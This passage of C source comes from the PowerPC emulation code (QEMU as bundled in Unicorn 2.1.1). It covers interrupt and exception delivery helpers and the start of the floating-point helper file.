&env->spr[SPR_DCMP]; } qemu_log("6xx %sTLB miss: 
%cM " TARGET_FMT_lx " %cC " TARGET_FMT_lx " H1 " TARGET_FMT_lx " H2 " TARGET_FMT_lx " %08x\n", es, en, *miss, en, *cmp, env->spr[SPR_HASH1], env->spr[SPR_HASH2], env->error_code); } #endif msr |= env->crf[0] << 28; msr |= env->error_code; /* key, D/I, S/L bits */ /* Set way using a LRU mechanism */ msr |= ((env->last_way + 1) & (env->nb_ways - 1)) << 17; break; case POWERPC_EXCP_74xx: tlb_miss_74xx: #if defined(DEBUG_SOFTWARE_TLB) if (qemu_log_enabled()) { const char *es; target_ulong *miss, *cmp; int en; if (excp == POWERPC_EXCP_IFTLB) { es = "I"; en = 'I'; miss = &env->spr[SPR_TLBMISS]; cmp = &env->spr[SPR_PTEHI]; } else { if (excp == POWERPC_EXCP_DLTLB) { es = "DL"; } else { es = "DS"; } en = 'D'; miss = &env->spr[SPR_TLBMISS]; cmp = &env->spr[SPR_PTEHI]; } qemu_log("74xx %sTLB miss: %cM " TARGET_FMT_lx " %cC " TARGET_FMT_lx " %08x\n", es, en, *miss, en, *cmp, env->error_code); } #endif msr |= env->error_code; /* key bit */ break; default: cpu_abort(cs, "Invalid data store TLB miss exception\n"); break; } break; case POWERPC_EXCP_FPA: /* Floating-point assist exception */ /* XXX: TODO */ cpu_abort(cs, "Floating point assist exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_DABR: /* Data address breakpoint */ /* XXX: TODO */ cpu_abort(cs, "DABR exception is not implemented yet !\n"); break; case POWERPC_EXCP_IABR: /* Instruction address breakpoint */ /* XXX: TODO */ cpu_abort(cs, "IABR exception is not implemented yet !\n"); break; case POWERPC_EXCP_SMI: /* System management interrupt */ /* XXX: TODO */ cpu_abort(cs, "SMI exception is not implemented yet !\n"); break; case POWERPC_EXCP_THERM: /* Thermal interrupt */ /* XXX: TODO */ cpu_abort(cs, "Thermal management exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_PERFM: /* Embedded performance monitor interrupt */ /* XXX: TODO */ cpu_abort(cs, "Performance counter exception is not implemented yet !\n"); break; case POWERPC_EXCP_VPUA: /* Vector assist exception */ /* XXX: TODO */ cpu_abort(cs, "VPU assist exception is not implemented yet !\n"); break; case POWERPC_EXCP_SOFTP: /* Soft patch exception */ /* XXX: TODO */ cpu_abort(cs, "970 soft-patch exception is not implemented yet !\n"); break; case POWERPC_EXCP_MAINT: /* Maintenance exception */ /* XXX: TODO */ cpu_abort(cs, "970 maintenance exception is not implemented yet !\n"); break; case POWERPC_EXCP_MEXTBR: /* Maskable external breakpoint */ /* XXX: TODO */ cpu_abort(cs, "Maskable external exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_NMEXTBR: /* Non maskable external breakpoint */ /* XXX: TODO */ cpu_abort(cs, "Non maskable external exception " "is not implemented yet !\n"); break; default: excp_invalid: cpu_abort(cs, "Invalid PowerPC exception %d. Aborting\n", excp); break; } /* Save PC */ env->spr[srr0] = env->nip; /* Save MSR */ env->spr[srr1] = msr; /* Sanity check */ if (!(env->msr_mask & MSR_HVB)) { if (new_msr & MSR_HVB) { cpu_abort(cs, "Trying to deliver HV exception (MSR) %d with " "no HV support\n", excp); } if (srr0 == SPR_HSRR0) { cpu_abort(cs, "Trying to deliver HV exception (HSRR) %d with " "no HV support\n", excp); } } /* If any alternate SRR register are defined, duplicate saved values */ if (asrr0 != -1) { env->spr[asrr0] = env->spr[srr0]; } if (asrr1 != -1) { env->spr[asrr1] = env->spr[srr1]; } /* * Sort out endianness of interrupt, this differs depending on the * CPU, the HV mode, etc... 
*/ #ifdef TARGET_PPC64 if (excp_model == POWERPC_EXCP_POWER7) { if (!(new_msr & MSR_HVB) && (env->spr[SPR_LPCR] & LPCR_ILE)) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (excp_model == POWERPC_EXCP_POWER8) { if (new_msr & MSR_HVB) { if (env->spr[SPR_HID0] & HID0_HILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (env->spr[SPR_LPCR] & LPCR_ILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (excp_model == POWERPC_EXCP_POWER9) { if (new_msr & MSR_HVB) { if (env->spr[SPR_HID0] & HID0_POWER9_HILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (env->spr[SPR_LPCR] & LPCR_ILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (msr_ile) { new_msr |= (target_ulong)1 << MSR_LE; } #else if (msr_ile) { new_msr |= (target_ulong)1 << MSR_LE; } #endif /* Jump to handler */ vector = env->excp_vectors[excp]; #ifdef _MSC_VER if (vector == (target_ulong)(0ULL - 1ULL)) { #else if (vector == (target_ulong)-1ULL) { #endif cpu_abort(cs, "Raised an exception without defined vector %d\n", excp); } vector |= env->excp_prefix; /* * AIL only works if there is no HV transition and we are running * with translations enabled */ if (!((msr >> MSR_IR) & 1) || !((msr >> MSR_DR) & 1) || ((new_msr & MSR_HVB) && !(msr & MSR_HVB))) { ail = 0; } /* Handle AIL */ if (ail) { new_msr |= (1 << MSR_IR) | (1 << MSR_DR); vector |= ppc_excp_vector_offset(cs, ail); } #if defined(TARGET_PPC64) if (excp_model == POWERPC_EXCP_BOOKE) { if (env->spr[SPR_BOOKE_EPCR] & EPCR_ICM) { /* Cat.64-bit: EPCR.ICM is copied to MSR.CM */ new_msr |= (target_ulong)1 << MSR_CM; } else { vector = (uint32_t)vector; } } else { if (!msr_isf && !(env->mmu_model & POWERPC_MMU_64)) { vector = (uint32_t)vector; } else { new_msr |= (target_ulong)1 << MSR_SF; } } #endif powerpc_set_excp_state(cpu, vector, new_msr); } void ppc_cpu_do_interrupt(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; powerpc_excp(cpu, env->excp_model, cs->exception_index); } static void ppc_hw_interrupt(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); bool async_deliver; /* External reset */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_RESET)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_RESET); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_RESET); return; } /* Machine check exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_MCK)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_MCK); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_MCHECK); return; } #if 0 /* TODO */ /* External debug exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DEBUG)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DEBUG); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DEBUG); return; } #endif /* * For interrupts that gate on MSR:EE, we need to do something a * bit more subtle, as we need to let them through even when EE is * clear when coming out of some power management states (in order * for them to become a 0x100). 
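* resume_as_sreset below is what encodes that wake-from-power-save condition.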
*/ async_deliver = (msr_ee != 0) || env->resume_as_sreset; /* Hypervisor decrementer exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_HDECR)) { /* LPCR will be clear when not supported so this will work */ bool hdice = !!(env->spr[SPR_LPCR] & LPCR_HDICE); if ((async_deliver || msr_hv == 0) && hdice) { /* HDEC clears on delivery */ env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDECR); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_HDECR); return; } } /* Hypervisor virtualization interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_HVIRT)) { /* LPCR will be clear when not supported so this will work */ bool hvice = !!(env->spr[SPR_LPCR] & LPCR_HVICE); if ((async_deliver || msr_hv == 0) && hvice) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_HVIRT); return; } } /* External interrupt can ignore MSR:EE under some circumstances */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_EXT)) { bool lpes0 = !!(env->spr[SPR_LPCR] & LPCR_LPES0); bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); /* HEIC blocks delivery to the hypervisor */ if ((async_deliver && !(heic && msr_hv && !msr_pr)) || (env->has_hv_mode && msr_hv == 0 && !lpes0)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_EXTERNAL); return; } } if (msr_ce != 0) { /* External critical interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_CEXT)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_CRITICAL); return; } } if (async_deliver != 0) { /* Watchdog timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_WDT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_WDT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_WDT); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_CDOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_CDOORBELL); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DOORCI); return; } /* Fixed interval timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_FIT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_FIT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_FIT); return; } /* Programmable interval timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_PIT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_PIT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_PIT); return; } /* Decrementer exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DECR)) { if (ppc_decr_clear_on_delivery(env)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DECR); } powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DECR); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_DOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); if (is_book3s_arch2x(env)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_SDOOR); } else { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DOORI); } return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_HDOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDOORBELL); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_SDOOR_HV); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_PERFM)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_PERFM); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_PERFM); return; } /* Thermal interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_THERM)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_THERM); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_THERM); return; } } if (env->resume_as_sreset) { /* * This is a bug ! 
It means that has_work took us out of halt without * anything to deliver while in a PM state that requires getting * out via a 0x100 * * This means we will incorrectly execute past the power management * instruction instead of triggering a reset. * * It generally means a discrepancy between the wakup conditions in the * processor has_work implementation and the logic in this function. */ cpu_abort(env_cpu(env), "Wakeup from PM state but interrupt Undelivered"); } } void ppc_cpu_do_system_reset(CPUState *cs, target_ulong vector) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_RESET); if (vector != -1) { env->nip = vector; } } void ppc_cpu_do_fwnmi_machine_check(CPUState *cs, target_ulong vector) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); target_ulong msr = 0; /* * Set MSR and NIP for the handler, SRR0/1, DAR and DSISR have already * been set by KVM. */ msr = (1ULL << MSR_ME); msr |= env->msr & (1ULL << MSR_SF); if (!(*pcc->interrupts_big_endian)(cpu)) { msr |= (1ULL << MSR_LE); } powerpc_set_excp_state(cpu, vector, msr); } bool ppc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_HARD) { ppc_hw_interrupt(env); if (env->pending_interrupts == 0) { cs->interrupt_request &= ~CPU_INTERRUPT_HARD; } return true; } return false; } #if defined(DEBUG_OP) static void cpu_dump_rfi(target_ulong RA, target_ulong msr) { qemu_log("Return from exception at " TARGET_FMT_lx " with flags " TARGET_FMT_lx "\n", RA, msr); } #endif /*****************************************************************************/ /* Exceptions processing helpers */ void raise_exception_err_ra(CPUPPCState *env, uint32_t exception, uint32_t error_code, uintptr_t raddr) { CPUState *cs = env_cpu(env); cs->exception_index = exception; env->error_code = error_code; cpu_loop_exit_restore(cs, raddr); } void raise_exception_err(CPUPPCState *env, uint32_t exception, uint32_t error_code) { raise_exception_err_ra(env, exception, error_code, 0); } void raise_exception(CPUPPCState *env, uint32_t exception) { raise_exception_err_ra(env, exception, 0, 0); } void raise_exception_ra(CPUPPCState *env, uint32_t exception, uintptr_t raddr) { raise_exception_err_ra(env, exception, 0, raddr); } void helper_raise_exception_err(CPUPPCState *env, uint32_t exception, uint32_t error_code) { raise_exception_err_ra(env, exception, error_code, 0); } void helper_raise_exception(CPUPPCState *env, uint32_t exception) { raise_exception_err_ra(env, exception, 0, 0); } void helper_store_msr(CPUPPCState *env, target_ulong val) { uint32_t excp = hreg_store_msr(env, val, 0); if (excp != 0) { CPUState *cs = env_cpu(env); cpu_interrupt_exittb(cs); raise_exception(env, excp); } } #if defined(TARGET_PPC64) #if defined(_MSC_VER) && defined(__clang__) void helper_pminsn(CPUPPCState *env, uint32_t insn) #else void helper_pminsn(CPUPPCState *env, uint32_t /*powerpc_pm_insn_t*/ insn) #endif { CPUState *cs; cs = env_cpu(env); cs->halted = 1; /* * The architecture specifies that HDEC interrupts are discarded * in PM states */ env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDECR); /* Condition for waking up at 0x100 */ env->resume_as_sreset = (insn != PPC_PM_STOP) || (env->spr[SPR_PSSCR] & PSSCR_EC); } #endif /* defined(TARGET_PPC64) */ static inline void do_rfi(CPUPPCState *env, target_ulong nip, target_ulong msr) { CPUState *cs = 
env_cpu(env); /* MSR:POW cannot be set by any form of rfi */ msr &= ~(1ULL << MSR_POW); #if defined(TARGET_PPC64) /* Switching to 32-bit ? Crop the nip */ if (!msr_is_64bit(env, msr)) { nip = (uint32_t)nip; } #else nip = (uint32_t)nip; #endif /* XXX: beware: this is false if VLE is supported */ env->nip = nip & ~((target_ulong)0x00000003); hreg_store_msr(env, msr, 1); #if defined(DEBUG_OP) cpu_dump_rfi(env->nip, env->msr); #endif /* * No need to raise an exception here, as rfi is always the last * insn of a TB */ cpu_interrupt_exittb(cs); /* Reset the reservation */ env->reserve_addr = -1; /* Context synchronizing: check if TCG TLB needs flush */ check_tlb_flush(env, false); } void helper_rfi(CPUPPCState *env) { do_rfi(env, env->spr[SPR_SRR0], env->spr[SPR_SRR1] & 0xfffffffful); } #define MSR_BOOK3S_MASK #if defined(TARGET_PPC64) void helper_rfid(CPUPPCState *env) { /* * The architeture defines a number of rules for which bits can * change but in practice, we handle this in hreg_store_msr() * which will be called by do_rfi(), so there is no need to filter * here */ do_rfi(env, env->spr[SPR_SRR0], env->spr[SPR_SRR1]); } void helper_hrfid(CPUPPCState *env) { do_rfi(env, env->spr[SPR_HSRR0], env->spr[SPR_HSRR1]); } #endif /*****************************************************************************/ /* Embedded PowerPC specific helpers */ void helper_40x_rfci(CPUPPCState *env) { do_rfi(env, env->spr[SPR_40x_SRR2], env->spr[SPR_40x_SRR3]); } void helper_rfci(CPUPPCState *env) { do_rfi(env, env->spr[SPR_BOOKE_CSRR0], env->spr[SPR_BOOKE_CSRR1]); } void helper_rfdi(CPUPPCState *env) { /* FIXME: choose CSRR1 or DSRR1 based on cpu type */ do_rfi(env, env->spr[SPR_BOOKE_DSRR0], env->spr[SPR_BOOKE_DSRR1]); } void helper_rfmci(CPUPPCState *env) { /* FIXME: choose CSRR1 or MCSRR1 based on cpu type */ do_rfi(env, env->spr[SPR_BOOKE_MCSRR0], env->spr[SPR_BOOKE_MCSRR1]); } void helper_tw(CPUPPCState *env, target_ulong arg1, target_ulong arg2, uint32_t flags) { if (!likely(!(((int32_t)arg1 < (int32_t)arg2 && (flags & 0x10)) || ((int32_t)arg1 > (int32_t)arg2 && (flags & 0x08)) || ((int32_t)arg1 == (int32_t)arg2 && (flags & 0x04)) || ((uint32_t)arg1 < (uint32_t)arg2 && (flags & 0x02)) || ((uint32_t)arg1 > (uint32_t)arg2 && (flags & 0x01))))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP, GETPC()); } } #if defined(TARGET_PPC64) void helper_td(CPUPPCState *env, target_ulong arg1, target_ulong arg2, uint32_t flags) { if (!likely(!(((int64_t)arg1 < (int64_t)arg2 && (flags & 0x10)) || ((int64_t)arg1 > (int64_t)arg2 && (flags & 0x08)) || ((int64_t)arg1 == (int64_t)arg2 && (flags & 0x04)) || ((uint64_t)arg1 < (uint64_t)arg2 && (flags & 0x02)) || ((uint64_t)arg1 > (uint64_t)arg2 && (flags & 0x01))))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP, GETPC()); } } #endif /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ void helper_rfsvc(CPUPPCState *env) { do_rfi(env, env->lr, env->ctr & 0x0000FFFF); } /* Embedded.Processor Control */ static int dbell2irq(target_ulong rb) { int msg = rb & DBELL_TYPE_MASK; int irq = -1; switch (msg) { case DBELL_TYPE_DBELL: irq = PPC_INTERRUPT_DOORBELL; break; case DBELL_TYPE_DBELL_CRIT: irq = PPC_INTERRUPT_CDOORBELL; break; case DBELL_TYPE_G_DBELL: case DBELL_TYPE_G_DBELL_CRIT: case DBELL_TYPE_G_DBELL_MC: /* XXX implement */ default: break; } return irq; } void helper_msgclr(CPUPPCState *env, target_ulong rb) { int irq = dbell2irq(rb); if (irq < 0) { 
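/* reserved and guest doorbell message types map to no IRQ and are ignored */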
return; } env->pending_interrupts &= ~(1 << irq); } void helper_msgsnd(CPUPPCState *env, target_ulong rb) { int irq = dbell2irq(rb); int pir = rb & DBELL_PIRTAG_MASK; CPUState *cs = (CPUState *)env; PowerPCCPU *cpu = POWERPC_CPU(env->uc->cpu); CPUPPCState *cenv = &cpu->env; if (irq < 0) { return; } if ((rb & DBELL_BRDCAST) || (cenv->spr[SPR_BOOKE_PIR] == pir)) { cenv->pending_interrupts |= 1 << irq; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } } /* Server Processor Control */ static bool dbell_type_server(target_ulong rb) { /* * A Directed Hypervisor Doorbell message is sent only if the * message type is 5. All other types are reserved and the * instruction is a no-op */ return (rb & DBELL_TYPE_MASK) == DBELL_TYPE_DBELL_SERVER; } void helper_book3s_msgclr(CPUPPCState *env, target_ulong rb) { if (!dbell_type_server(rb)) { return; } env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDOORBELL); } static void book3s_msgsnd_common(CPUPPCState *env, int pir, int irq) { CPUState *cs = (CPUState *)env; PowerPCCPU *cpu = POWERPC_CPU(env->uc->cpu); CPUPPCState *cenv = &cpu->env; /* TODO: broadcast message to all threads of the same processor */ if (cenv->spr_cb[SPR_PIR].default_value == pir) { cenv->pending_interrupts |= 1 << irq; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } } void helper_book3s_msgsnd(CPUPPCState *env, target_ulong rb) { int pir = rb & DBELL_PROCIDTAG_MASK; if (!dbell_type_server(rb)) { return; } book3s_msgsnd_common(env, pir, PPC_INTERRUPT_HDOORBELL); } #if defined(TARGET_PPC64) void helper_book3s_msgclrp(CPUPPCState *env, target_ulong rb) { helper_hfscr_facility_check(env, HFSCR_MSGP, "msgclrp", HFSCR_IC_MSGP); if (!dbell_type_server(rb)) { return; } env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); } /* * sends a message to other threads that are on the same * multi-threaded processor */ void helper_book3s_msgsndp(CPUPPCState *env, target_ulong rb) { int pir = env->spr_cb[SPR_PIR].default_value; helper_hfscr_facility_check(env, HFSCR_MSGP, "msgsndp", HFSCR_IC_MSGP); if (!dbell_type_server(rb)) { return; } /* TODO: TCG supports only one thread */ book3s_msgsnd_common(env, pir, PPC_INTERRUPT_DOORBELL); } #endif void ppc_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUPPCState *env = cs->env_ptr; uint32_t insn; /* Restore state and reload the insn we executed, for filling in DSISR. */ cpu_restore_state(cs, retaddr, true); insn = cpu_ldl_code(env, env->nip); cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = insn & 0x03FF0000; cpu_loop_exit(cs); }

unicorn-2.1.1/qemu/target/ppc/fpu_helper.c

/* * PowerPC floating point and SPE emulation helpers for QEMU.
* * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "internal.h" #include "fpu/softfloat.h" static inline float128 float128_snan_to_qnan(float128 x) { float128 r; r.high = x.high | 0x0000800000000000; r.low = x.low; return r; } #define float64_snan_to_qnan(x) ((x) | 0x0008000000000000ULL) #define float32_snan_to_qnan(x) ((x) | 0x00400000) #define float16_snan_to_qnan(x) ((x) | 0x0200) static inline bool fp_exceptions_enabled(CPUPPCState *env) { return (env->msr & ((1U << MSR_FE0) | (1U << MSR_FE1))) != 0; } /*****************************************************************************/ /* Floating point operations helpers */ /* * This is the non-arithmatic conversion that happens e.g. on loads. * In the Power ISA pseudocode, this is called DOUBLE. */ uint64_t helper_todouble(uint32_t arg) { uint32_t abs_arg = arg & 0x7fffffff; uint64_t ret; if (likely(abs_arg >= 0x00800000)) { if (unlikely(extract32(arg, 23, 8) == 0xff)) { /* Inf or NAN. */ ret = (uint64_t)extract32(arg, 31, 1) << 63; ret |= (uint64_t)0x7ff << 52; ret |= (uint64_t)extract32(arg, 0, 23) << 29; } else { /* Normalized operand. */ ret = (uint64_t)extract32(arg, 30, 2) << 62; ret |= ((extract32(arg, 30, 1) ^ 1) * (uint64_t)7) << 59; ret |= (uint64_t)extract32(arg, 0, 30) << 29; } } else { /* Zero or Denormalized operand. */ ret = (uint64_t)extract32(arg, 31, 1) << 63; if (unlikely(abs_arg != 0)) { /* * Denormalized operand. * Shift fraction so that the msb is in the implicit bit position. * Thus, shift is in the range [1:23]. */ int shift = clz32(abs_arg) - 8; /* * The first 3 terms compute the float64 exponent. We then bias * this result by -1 so that we can swallow the implicit bit below. */ int exp = -126 - shift + 1023 - 1; ret |= (uint64_t)exp << 52; ret += (uint64_t)abs_arg << (52 - 23 + shift); } } return ret; } /* * This is the non-arithmatic conversion that happens e.g. on stores. * In the Power ISA pseudocode, this is called SINGLE. */ uint32_t helper_tosingle(uint64_t arg) { int exp = extract64(arg, 52, 11); uint32_t ret; if (likely(exp > 896)) { /* No denormalization required (includes Inf, NaN). */ ret = extract64(arg, 62, 2) << 30; ret |= extract64(arg, 29, 30); } else { /* * Zero or Denormal result. If the exponent is in bounds for * a single-precision denormal result, extract the proper * bits. If the input is not zero, and the exponent is out of * bounds, then the result is undefined; this underflows to * zero. */ ret = extract64(arg, 63, 1) << 31; if (unlikely(exp >= 874)) { /* Denormal result. 
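Reinsert the implicit integer bit, then shift the 53-bit significand right by (896 + 30 - exp) so it lands in the 23-bit single-precision fraction field; e.g. exp == 896 shifts by 30, placing the implicit bit at fraction bit 22.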
*/ ret |= ((1ULL << 52) | extract64(arg, 0, 52)) >> (896 + 30 - exp); } } return ret; } static inline int ppc_float32_get_unbiased_exp(float32 f) { return ((f >> 23) & 0xFF) - 127; } static inline int ppc_float64_get_unbiased_exp(float64 f) { return ((f >> 52) & 0x7FF) - 1023; } /* Classify a floating-point number. */ enum { is_normal = 1, is_zero = 2, is_denormal = 4, is_inf = 8, is_qnan = 16, is_snan = 32, is_neg = 64, }; #define COMPUTE_CLASS(tp) \ static int tp##_classify(tp arg) \ { \ int ret = tp##_is_neg(arg) * is_neg; \ if (unlikely(tp##_is_any_nan(arg))) { \ float_status dummy = { 0 }; /* snan_bit_is_one = 0 */ \ ret |= (tp##_is_signaling_nan(arg, &dummy) \ ? is_snan : is_qnan); \ } else if (unlikely(tp##_is_infinity(arg))) { \ ret |= is_inf; \ } else if (tp##_is_zero(arg)) { \ ret |= is_zero; \ } else if (tp##_is_zero_or_denormal(arg)) { \ ret |= is_denormal; \ } else { \ ret |= is_normal; \ } \ return ret; \ } COMPUTE_CLASS(float16) COMPUTE_CLASS(float32) COMPUTE_CLASS(float64) COMPUTE_CLASS(float128) static void set_fprf_from_class(CPUPPCState *env, int class) { static const uint8_t fprf[6][2] = { { 0x04, 0x08 }, /* normalized */ { 0x02, 0x12 }, /* zero */ { 0x14, 0x18 }, /* denormalized */ { 0x05, 0x09 }, /* infinity */ { 0x11, 0x11 }, /* qnan */ { 0x00, 0x00 }, /* snan -- flags are undefined */ }; bool isneg = class & is_neg; env->fpscr &= ~FP_FPRF; env->fpscr |= fprf[ctz32(class)][isneg] << FPSCR_FPRF; } #define COMPUTE_FPRF(tp) \ void helper_compute_fprf_##tp(CPUPPCState *env, tp arg) \ { \ set_fprf_from_class(env, tp##_classify(arg)); \ } COMPUTE_FPRF(float16) COMPUTE_FPRF(float32) COMPUTE_FPRF(float64) COMPUTE_FPRF(float128) /* Floating-point invalid operations exception */ static void finish_invalid_op_excp(CPUPPCState *env, int op, uintptr_t retaddr) { /* Update the floating-point invalid operation summary */ env->fpscr |= FP_VX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ve != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_FP | op, retaddr); } } } static void finish_invalid_op_arith(CPUPPCState *env, int op, bool set_fpcc, uintptr_t retaddr) { env->fpscr &= ~(FP_FR | FP_FI); if (fpscr_ve == 0) { if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } } finish_invalid_op_excp(env, op, retaddr); } /* Signalling NaN */ static void float_invalid_op_vxsnan(CPUPPCState *env, uintptr_t retaddr) { env->fpscr |= FP_VXSNAN; finish_invalid_op_excp(env, POWERPC_EXCP_FP_VXSNAN, retaddr); } /* Magnitude subtraction of infinities */ static void float_invalid_op_vxisi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXISI; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXISI, set_fpcc, retaddr); } /* Division of infinity by infinity */ static void float_invalid_op_vxidi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXIDI; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXIDI, set_fpcc, retaddr); } /* Division of zero by zero */ static void float_invalid_op_vxzdz(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXZDZ; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXZDZ, set_fpcc, retaddr); } /* Multiplication of zero by infinity */ static void float_invalid_op_vximz(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXIMZ; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXIMZ, set_fpcc, retaddr); } /* Square root of a 
negative number */ static void float_invalid_op_vxsqrt(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXSQRT; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXSQRT, set_fpcc, retaddr); } /* Ordered comparison of NaN */ static void float_invalid_op_vxvc(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXVC; if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } /* Update the floating-point invalid operation summary */ env->fpscr |= FP_VX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; /* We must update the target FPR before raising the exception */ if (fpscr_ve != 0) { CPUState *cs = env_cpu(env); cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_VXVC; /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* Exception is deferred */ } } /* Invalid conversion */ static void float_invalid_op_vxcvi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXCVI; env->fpscr &= ~(FP_FR | FP_FI); if (fpscr_ve == 0) { if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } } finish_invalid_op_excp(env, POWERPC_EXCP_FP_VXCVI, retaddr); } static inline void float_zero_divide_excp(CPUPPCState *env, uintptr_t raddr) { env->fpscr |= FP_ZX; env->fpscr &= ~(FP_FR | FP_FI); /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ze != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_FP | POWERPC_EXCP_FP_ZX, raddr); } } } static inline void float_overflow_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr 